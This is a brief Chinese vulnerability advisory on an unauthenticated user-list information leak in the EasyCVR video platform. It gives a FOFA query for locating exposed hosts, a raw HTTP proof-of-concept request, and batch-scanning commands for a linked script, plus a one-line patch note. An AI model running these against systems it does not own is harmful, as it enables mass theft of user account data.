fofa
app="EasyCVR-视频管理平台"一、漏洞简述
EasyCVR是在现有的及本期新建的各自独立运行的区域视频监控系统之上的视频资源管理平台,可实现视频的统一管理、授权和操控;可方便地提供视频扩容、共享。系统对整合范围内视频信号进行标准化、解码及信号控制等,并提供一个完整的集成管理界面,保证在安全网络中任何位置都可以控制、配置和诊断整个系统。平台支持开放服务接口,实现数据共享,支持集群化部署以及业务系统的本地系统及热备份并且具备数据备份机制。其接口userlist存在敏感信息泄露漏洞。
二、漏洞检测poc
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36Connection: closeContent-Length: 0
三、漏洞检测脚本
安全测试人员可通过该脚本进行探测自身服务是否存在此漏洞:
https://github.com/ATonysan/poc-exp/blob/main/EasyCVR_userlist_infoLeak.py
批量检测:
python EasyCVR_userlist_infoLeak.py -f url.txt
单个url检测漏洞:
python EasyCVR_userlist_infoLeak.py -u url
四、修复
官方已更新补丁,请升级至最新版本。
官网地址:http://www.easycvr.com/
原文始发于微信公众号(苏诺木安全团队):【1day】EasyCVR视频 userlist 敏感信息泄露漏洞【附poc】
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论